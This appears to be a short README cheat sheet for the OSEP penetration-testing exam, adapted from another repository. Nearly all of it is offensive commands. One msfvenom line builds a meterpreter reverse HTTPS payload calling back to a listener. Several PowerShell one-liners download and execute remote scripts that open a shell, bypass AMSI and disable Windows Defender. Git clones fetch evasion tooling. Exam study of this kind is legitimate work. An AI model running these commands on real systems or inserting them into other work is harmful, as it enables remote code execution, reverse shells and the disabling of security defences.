this repository modified based on from https://github.com/In3x0rabl3/OSEP
This repository will refresh your memory when taking the OSEP exam.
Thank you, to everyone who's code was used in this repository.
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.0.0.234 LPORT=443 -f ps1
(New-Object Net.WebClient).DownloadString('http://10.0.0.234:8000/msfvenom_bin/bypass_Ams1_getShell.ps1') | IEX;
(New-Object Net.WebClient).DownloadString('http://10.0.0.234:8000/bypass_defender/bypassAms1.ps1') | IEX;
(New-Object Net.WebClient).DownloadString('http://10.0.0.234:8000/bypass_defender/DefendersDeath.ps1') | IEX;
(New-Object Net.WebClient).DownloadString('http://10.0.0.234:8000/bypass_defender/DisableDefender.ps1') | IEX;
+ (need administrator priviledge)
git clone https://github.com/andrew-d/static-binaries.git
git clone https://github.com/optiv/Freeze
git clone https://github.com/noraj/OSCP-Exam-Report-Template-Markdown